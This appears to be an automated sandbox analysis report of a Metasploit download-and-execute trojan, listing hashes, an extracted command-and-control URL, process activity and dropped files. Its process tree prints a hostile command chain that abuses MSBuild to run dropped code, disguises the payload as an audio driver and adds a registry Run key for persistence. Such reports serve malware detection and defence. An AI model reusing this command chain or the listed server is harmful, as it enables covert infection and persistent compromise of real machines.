metasploit | 5dc5d009a19088a3c39c66eb561c7444eaebf1b46ff2982ece0b4352ba769fa2

General

Target

78f1c99154816317fae2c68f6310ae71.exe
Size

28KB
MD5

78f1c99154816317fae2c68f6310ae71
SHA1

a91ff3bd6339cc48712571ee539c974024236033
SHA256

5dc5d009a19088a3c39c66eb561c7444eaebf1b46ff2982ece0b4352ba769fa2
SHA512

f13c4ff6bb1402acc9d9020c17d9dc7ac74bc49d85a4783368487cfea9fb4f49f79bccfd46ecbc2496305fe03e93ee19f70a6863877ba207b5a25321ac89b65d

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/download_exec

C2

http://5.189.184.60:443/components/massaction.ico

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 8 created 3044 8 WerFault.exe regsvr32.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

8 3044 WerFault.exe regsvr32.exe

description	pid	process	target process
PID 8 created 3044	8	WerFault.exe	regsvr32.exe

pid	pid_target	process	target process
8	3044	WerFault.exe	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 8 WerFault.exe
Token: SeBackupPrivilege 8 WerFault.exe
Token: SeDebugPrivilege 8 WerFault.exe

description	pid	process
Token: SeRestorePrivilege	8	WerFault.exe
Token: SeBackupPrivilege	8	WerFault.exe
Token: SeDebugPrivilege	8	WerFault.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

78f1c99154816317fae2c68f6310ae71.execmd.exeMSBuild.execsc.exe

description	pid	process	target process
PID 652 wrote to memory of 1636	652	78f1c99154816317fae2c68f6310ae71.exe	cmd.exe
PID 652 wrote to memory of 1636	652	78f1c99154816317fae2c68f6310ae71.exe	cmd.exe
PID 1636 wrote to memory of 2600	1636	cmd.exe	MSBuild.exe
PID 1636 wrote to memory of 2600	1636	cmd.exe	MSBuild.exe
PID 1636 wrote to memory of 2600	1636	cmd.exe	MSBuild.exe
PID 2600 wrote to memory of 3744	2600	MSBuild.exe	csc.exe
PID 2600 wrote to memory of 3744	2600	MSBuild.exe	csc.exe
PID 2600 wrote to memory of 3744	2600	MSBuild.exe	csc.exe
PID 3744 wrote to memory of 208	3744	csc.exe	cvtres.exe
PID 3744 wrote to memory of 208	3744	csc.exe	cvtres.exe
PID 3744 wrote to memory of 208	3744	csc.exe	cvtres.exe
PID 2600 wrote to memory of 3044	2600	MSBuild.exe	regsvr32.exe
PID 2600 wrote to memory of 3044	2600	MSBuild.exe	regsvr32.exe
PID 2600 wrote to memory of 3044	2600	MSBuild.exe	regsvr32.exe
PID 2600 wrote to memory of 3044	2600	MSBuild.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\78f1c99154816317fae2c68f6310ae71.exe
"C:\Users\Admin\AppData\Local\Temp\78f1c99154816317fae2c68f6310ae71.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /nologo /noconsolelogger /verbosity:quiet C:\ProgramData\0f2cbf26-userSettings.xml && move Big_Black_Cock.exe C:\ProgramData\HDAudio.exe && reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v HighDefinitionAudio /t REG_SZ /f /d "C:\ProgramData\HDAudio.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /nologo /noconsolelogger /verbosity:quiet C:\ProgramData\0f2cbf26-userSettings.xml
3⤵
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\skevreyf\skevreyf.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C4A.tmp" "c:\Users\Admin\AppData\Local\Temp\skevreyf\CSCC1E8153714F4C088260825073B44FAC.TMP"
5⤵
PID:208

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe"
4⤵
PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1388
5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\0f2cbf26-userSettings.xml
MD5
25c4205d216ca202c4aa20d272df60e7

SHA1
fb1958cb467b2506bf28c8096e923ff14a7f20fb

SHA256
86b30a1a30bf4837735489189e4fba5122d71f8d5c722eb33ae6bb5540c1068e

SHA512
17ed3312616db28cee930c800c58ebd999be32baa4c025cd024fbb836fabfcfef194ace2e7a66b8e4d77d0a842ea61c7be7d0c053bb6d072d4707ec0a123d690

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7C4A.tmp
MD5
590366cb06ff1ccab7b94db068025bf3

SHA1
2815bdd4969061546806e811cf78e38074ca3639

SHA256
92aa9beb15b4ea1cc0b03eb58f1442426b4b2445a4056ad86c6f3fc6507aef04

SHA512
a051f14740ec58e56f05a0664ed7322f390d1c3f605704f0693e09bb7e027ca86604c7eb40d4bfbc4bb790883b0e53271ecdca36d0833edc2a23910b13ba594e

Download Submit
C:\Users\Admin\AppData\Local\Temp\skevreyf\skevreyf.dll
MD5
8218c291fbae46623342f9406ee28ea3

SHA1
70479aff402318c8dd7d7ef1a831fb789fdcef54

SHA256
747caa3b8a04f00ef2edc73b1d90fe2739039cb6fd3f77d584261c23ba3b9716

SHA512
122503ddd356dc473679d15325fc97ee80a6779a6760ffd362dba8dd9386bce5f5554fa1ceb439b0905080e122ee04ce5749a092ba3e806759e93d2742315a1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\skevreyf\skevreyf.pdb
MD5
dbc5ee165aeea4c851c90211383d0224

SHA1
65636fa2e1cafe6b13a3f705c30daa02d6c96103

SHA256
7bee3351a69c5e2c29034450320af19a99633685c9d31d0ed414468f5ffd295f

SHA512
f699677babd0ea3c07ce4bf70b811f7f3ce3b44d505bd7f73770e1a8b4592f432658d2ec59bb529cd38f7335909f2b187234e4d654e2bf2aa42f33c0155dac0c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\skevreyf\CSCC1E8153714F4C088260825073B44FAC.TMP
MD5
d7bfd8419d07cfd47b40b138c1ac4eb1

SHA1
f1e29766520c240d98174478dbb84669d717e152

SHA256
54ffb74715d1a3e116dd3c01eb00dd8637f357419d8bed62870affd3d5d97118

SHA512
3e436a2d7b89e8c0123030efb696c6b77441d62675952a6f7fc9dbb9a2f44920370c923e620cd0f27ddedec85f9f34fb0cd4b5c9190799f8f2dbf01ea9d7dfcd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\skevreyf\skevreyf.0.cs
MD5
2a250a410913932e9f696e6c7d6eac72

SHA1
c92ac07d9eb112b4920f04f67efa0ed9daa635f0

SHA256
49ef860b064c65cfc01a3c8d8f869bd91c1e60acb5ab122f6dcd0ffd77387d28

SHA512
9feca2d20884d732b96302c594587f0adef730c04f3f78519bd2e3a0de2f67c9215f52fa97b214d434b0b55eeca8d848a402a6e275d2923f564892ded0911625

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\skevreyf\skevreyf.cmdline
MD5
aaccc781278575c6b083a3fefc9026f3

SHA1
04af76733feca9be8e55557f2c4f9643b9ef74cd

SHA256
26365e40d9e1f82d6151f7181e76f366e4854b3d1e0df24226c0540071cb060f

SHA512
6e8c8fa03879e0e1d27d356a2dcfcc6f35ec229a2bae089bda6ab25aac8d3f053571caee7cfc866176458776bf3036b5c0369a556eebe3c214d24ca1ef4f49bd

Download Submit
memory/208-132-0x0000000000000000-mapping.dmp

Download
memory/1636-114-0x0000000000000000-mapping.dmp

Download
memory/2600-122-0x0000000005BE0000-0x0000000005BE1000-memory.dmp

Filesize
4KB

Download
memory/2600-121-0x0000000002940000-0x000000000295A000-memory.dmp

Filesize
104KB

Download
memory/2600-128-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/2600-137-0x0000000005660000-0x0000000005663000-memory.dmp

Filesize
12KB

Download
memory/2600-118-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/2600-127-0x0000000005E40000-0x0000000005E41000-memory.dmp

Filesize
4KB

Download
memory/2600-117-0x0000000002960000-0x0000000002961000-memory.dmp

Filesize
4KB

Download
memory/2600-124-0x0000000005B00000-0x0000000005B01000-memory.dmp

Filesize
4KB

Download
memory/2600-115-0x0000000000000000-mapping.dmp

Download
memory/2600-116-0x00000000006C0000-0x00000000006C1000-memory.dmp

Filesize
4KB

Download
memory/2600-119-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/3044-140-0x0000000004DB0000-0x00000000051B0000-memory.dmp

Filesize
4.0MB

Download
memory/3044-138-0x0000000002990000-0x0000000002991000-memory.dmp

Filesize
4KB

Download
memory/3044-139-0x0000000000000000-mapping.dmp

Download
memory/3744-129-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing